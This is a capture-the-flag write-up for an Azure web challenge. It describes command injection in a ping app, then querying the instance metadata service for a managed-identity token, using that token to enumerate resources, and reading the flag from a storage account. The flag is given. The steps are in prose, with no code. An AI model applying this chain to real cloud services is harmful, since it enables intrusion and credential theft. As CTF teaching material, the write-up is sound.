Managed Secrets

Difficulty
Points
Solves

Medium

500

3

Description

Today in school, I learnt how to create a website with python! There is also the networking lesson where i learn the ping command...

ps the flag is not in the instance :)

https://lncctf2023-webapp.azurewebsites.net

Hints: Are there any internal services/endpoint running by default?

Visiting the sites show an Azure Web App Service running

LogoWeb App Service | Microsoft Azureazure.microsoft.com

What the web app does is to send a ping to whatever IP Address or URL you define it to. This is a very classical command injection sample challenge, and we are able to easily get code execution

Since I now have code execution, I can get the app service to post to the IMDS to retrieve a management token refering to hacktricks.

LogoCloud SSRF - HackTricksbook.hacktricks.xyz

I am able to authenticate using the access token and client id value

Next, I enumerate the resource that this service principal has access to.

I am then able to retrieve the flag from the storage account.

Flag: LNC2023{h3y_h0w_did_y0u_g3T_thi5}

PreviousLag and Crash 2023NextPickle Rick

Last updated

Was this helpful?